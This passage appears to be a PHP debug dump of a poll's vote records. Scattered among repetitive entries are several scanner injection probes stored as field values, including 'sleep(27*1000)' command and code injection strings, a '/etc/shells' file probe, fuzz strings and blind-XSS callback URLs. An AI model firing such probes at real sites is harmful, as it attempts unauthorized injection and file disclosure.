(int) 1917 => array(
'id' => '2460',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1918 => array(
'id' => '2461',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1919 => array(
'id' => '2462',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1920 => array(
'id' => '2463',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1921 => array(
'id' => '2464',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1922 => array(
'id' => '2465',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1923 => array(
'id' => '2466',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1924 => array(
'id' => '2467',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1925 => array(
'id' => '2468',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1926 => array(
'id' => '2469',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1927 => array(
'id' => '2470',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1928 => array(
'id' => '2471',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1929 => array(
'id' => '2472',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1930 => array(
'id' => '2473',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1931 => array(
'id' => '2474',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1932 => array(
'id' => '2475',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1933 => array(
'id' => '2476',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1934 => array(
'id' => '2477',
'ip' => ')',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1935 => array(
'id' => '2478',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1936 => array(
'id' => '2479',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1937 => array(
'id' => '2480',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1938 => array(
'id' => '2481',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1939 => array(
'id' => '2482',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1940 => array(
'id' => '2483',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1941 => array(
'id' => '2484',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1942 => array(
'id' => '2485',
'ip' => '!(()&&!|*|*|',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1943 => array(
'id' => '2486',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1944 => array(
'id' => '2487',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1945 => array(
'id' => '2488',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1946 => array(
'id' => '2489',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1947 => array(
'id' => '2490',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1948 => array(
'id' => '2491',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1949 => array(
'id' => '2492',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1950 => array(
'id' => '2493',
'ip' => '^(#$!@#$)(()))******',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1951 => array(
'id' => '2494',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1952 => array(
'id' => '2495',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1953 => array(
'id' => '2496',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1954 => array(
'id' => '2497',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1955 => array(
'id' => '2498',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1956 => array(
'id' => '2499',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1957 => array(
'id' => '2500',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1958 => array(
'id' => '2501',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1959 => array(
'id' => '2502',
'ip' => '194.34.233.95',
'ip1' => ')',
'sondage_id' => '2'
),
(int) 1960 => array(
'id' => '2503',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1961 => array(
'id' => '2504',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1962 => array(
'id' => '2505',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1963 => array(
'id' => '2506',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1964 => array(
'id' => '2507',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1965 => array(
'id' => '2508',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1966 => array(
'id' => '2509',
'ip' => '194.34.233.95',
'ip1' => '!(()&&!|*|*|',
'sondage_id' => '2'
),
(int) 1967 => array(
'id' => '2510',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1968 => array(
'id' => '2511',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1969 => array(
'id' => '2512',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1970 => array(
'id' => '2513',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1971 => array(
'id' => '2514',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1972 => array(
'id' => '2515',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1973 => array(
'id' => '2516',
'ip' => '194.34.233.95',
'ip1' => '^(#$!@#$)(()))******',
'sondage_id' => '2'
),
(int) 1974 => array(
'id' => '2517',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1975 => array(
'id' => '2518',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1976 => array(
'id' => '2519',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1977 => array(
'id' => '2520',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1978 => array(
'id' => '2521',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1979 => array(
'id' => '2522',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1980 => array(
'id' => '2523',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1981 => array(
'id' => '2524',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1982 => array(
'id' => '2525',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1983 => array(
'id' => '2526',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1984 => array(
'id' => '2527',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1985 => array(
'id' => '2528',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1986 => array(
'id' => '2529',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1987 => array(
'id' => '2530',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1988 => array(
'id' => '2531',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1989 => array(
'id' => '2532',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1990 => array(
'id' => '2533',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1991 => array(
'id' => '2534',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1992 => array(
'id' => '2535',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1993 => array(
'id' => '2536',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1994 => array(
'id' => '2537',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1995 => array(
'id' => '2538',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1996 => array(
'id' => '2539',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1997 => array(
'id' => '2540',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1998 => array(
'id' => '2541',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 1999 => array(
'id' => '2542',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2000 => array(
'id' => '2543',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2001 => array(
'id' => '2544',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2002 => array(
'id' => '2545',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2003 => array(
'id' => '2546',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2004 => array(
'id' => '2547',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2005 => array(
'id' => '2548',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2006 => array(
'id' => '2549',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2007 => array(
'id' => '2550',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2008 => array(
'id' => '2551',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2009 => array(
'id' => '2552',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2010 => array(
'id' => '2553',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2011 => array(
'id' => '2554',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2012 => array(
'id' => '2555',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2013 => array(
'id' => '2556',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2014 => array(
'id' => '2557',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2015 => array(
'id' => '2558',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2016 => array(
'id' => '2559',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2017 => array(
'id' => '2560',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2018 => array(
'id' => '2561',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2019 => array(
'id' => '2562',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2020 => array(
'id' => '2563',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2021 => array(
'id' => '2564',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2022 => array(
'id' => '2565',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2023 => array(
'id' => '2566',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2024 => array(
'id' => '2567',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2025 => array(
'id' => '2568',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2026 => array(
'id' => '2569',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2027 => array(
'id' => '2570',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2028 => array(
'id' => '2571',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2029 => array(
'id' => '2572',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2030 => array(
'id' => '2573',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2031 => array(
'id' => '2574',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2032 => array(
'id' => '2575',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2033 => array(
'id' => '2576',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2034 => array(
'id' => '2577',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2035 => array(
'id' => '2578',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2036 => array(
'id' => '2579',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2037 => array(
'id' => '2580',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2038 => array(
'id' => '2581',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2039 => array(
'id' => '2582',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2040 => array(
'id' => '2583',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2041 => array(
'id' => '2584',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2042 => array(
'id' => '2585',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2043 => array(
'id' => '2586',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2044 => array(
'id' => '2587',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2045 => array(
'id' => '2588',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2046 => array(
'id' => '2589',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2047 => array(
'id' => '2590',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2048 => array(
'id' => '2591',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2049 => array(
'id' => '2592',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2050 => array(
'id' => '2593',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2051 => array(
'id' => '2594',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2052 => array(
'id' => '2595',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2053 => array(
'id' => '2596',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2054 => array(
'id' => '2597',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2055 => array(
'id' => '2598',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2056 => array(
'id' => '2599',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2057 => array(
'id' => '2600',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2058 => array(
'id' => '2601',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2059 => array(
'id' => '2602',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2060 => array(
'id' => '2603',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2061 => array(
'id' => '2604',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2062 => array(
'id' => '2605',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2063 => array(
'id' => '2606',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2064 => array(
'id' => '2607',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2065 => array(
'id' => '2608',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2066 => array(
'id' => '2609',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2067 => array(
'id' => '2610',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2068 => array(
'id' => '2611',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2069 => array(
'id' => '2612',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2070 => array(
'id' => '2613',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2071 => array(
'id' => '2614',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2072 => array(
'id' => '2615',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2073 => array(
'id' => '2616',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2074 => array(
'id' => '2617',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2075 => array(
'id' => '2618',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2076 => array(
'id' => '2619',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2077 => array(
'id' => '2620',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2078 => array(
'id' => '2621',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2079 => array(
'id' => '2622',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2080 => array(
'id' => '2623',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2081 => array(
'id' => '2624',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2082 => array(
'id' => '2625',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2083 => array(
'id' => '2626',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2084 => array(
'id' => '2627',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2085 => array(
'id' => '2628',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2086 => array(
'id' => '2629',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2087 => array(
'id' => '2630',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2088 => array(
'id' => '2631',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2089 => array(
'id' => '2632',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2090 => array(
'id' => '2633',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2091 => array(
'id' => '2634',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2092 => array(
'id' => '2635',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2093 => array(
'id' => '2636',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2094 => array(
'id' => '2637',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2095 => array(
'id' => '2638',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2096 => array(
'id' => '2639',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2097 => array(
'id' => '2640',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2098 => array(
'id' => '2641',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2099 => array(
'id' => '2642',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2100 => array(
'id' => '2643',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2101 => array(
'id' => '2644',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2102 => array(
'id' => '2645',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2103 => array(
'id' => '2646',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2104 => array(
'id' => '2647',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2105 => array(
'id' => '2648',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2106 => array(
'id' => '2649',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2107 => array(
'id' => '2650',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2108 => array(
'id' => '2651',
'ip' => ''"()',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2109 => array(
'id' => '2652',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2110 => array(
'id' => '2653',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2111 => array(
'id' => '2654',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2112 => array(
'id' => '2655',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2113 => array(
'id' => '2656',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2114 => array(
'id' => '2657',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2115 => array(
'id' => '2658',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2116 => array(
'id' => '2659',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2117 => array(
'id' => '2660',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2118 => array(
'id' => '2661',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2119 => array(
'id' => '2662',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2120 => array(
'id' => '2663',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2121 => array(
'id' => '2664',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2122 => array(
'id' => '2665',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2123 => array(
'id' => '2666',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2124 => array(
'id' => '2667',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2125 => array(
'id' => '2668',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2126 => array(
'id' => '2669',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2127 => array(
'id' => '2670',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2128 => array(
'id' => '2671',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2129 => array(
'id' => '2672',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2130 => array(
'id' => '2673',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2131 => array(
'id' => '2674',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2132 => array(
'id' => '2675',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2133 => array(
'id' => '2676',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2134 => array(
'id' => '2677',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2135 => array(
'id' => '2678',
'ip' => '194.34.233.95',
'ip1' => ''"()',
'sondage_id' => '2'
),
(int) 2136 => array(
'id' => '2679',
'ip' => 'https://scimat.dz/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2137 => array(
'id' => '2680',
'ip' => '/etc/shells',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2138 => array(
'id' => '2681',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2139 => array(
'id' => '2682',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2140 => array(
'id' => '2683',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2141 => array(
'id' => '2684',
'ip' => '194.34.233.95',
'ip1' => '<pre class='&&sleep(27*1000)*wpwzkt&&'',
'sondage_id' => '2'
),
(int) 2142 => array(
'id' => '2685',
'ip' => 'https://bxss.me',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2143 => array(
'id' => '2686',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2144 => array(
'id' => '2687',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2145 => array(
'id' => '2688',
'ip' => 'https://bxss.me/',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2146 => array(
'id' => '2689',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2147 => array(
'id' => '2690',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2148 => array(
'id' => '2691',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2149 => array(
'id' => '2692',
'ip' => '194.34.233.95',
'ip1' => '<pre class="&&sleep(27*1000)*abtvwh&&"',
'sondage_id' => '2'
),
(int) 2150 => array(
'id' => '2693',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2151 => array(
'id' => '2694',
'ip' => '194.34.233.95',
'ip1' => '<pre class='||sleep(27*1000)*jegyry||'',
'sondage_id' => '2'
),
(int) 2152 => array(
'id' => '2695',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
'sondage_id' => '2'
),
(int) 2153 => array(
'id' => '2696',
'ip' => '194.34.233.95',
'ip1' => '<pre class=',
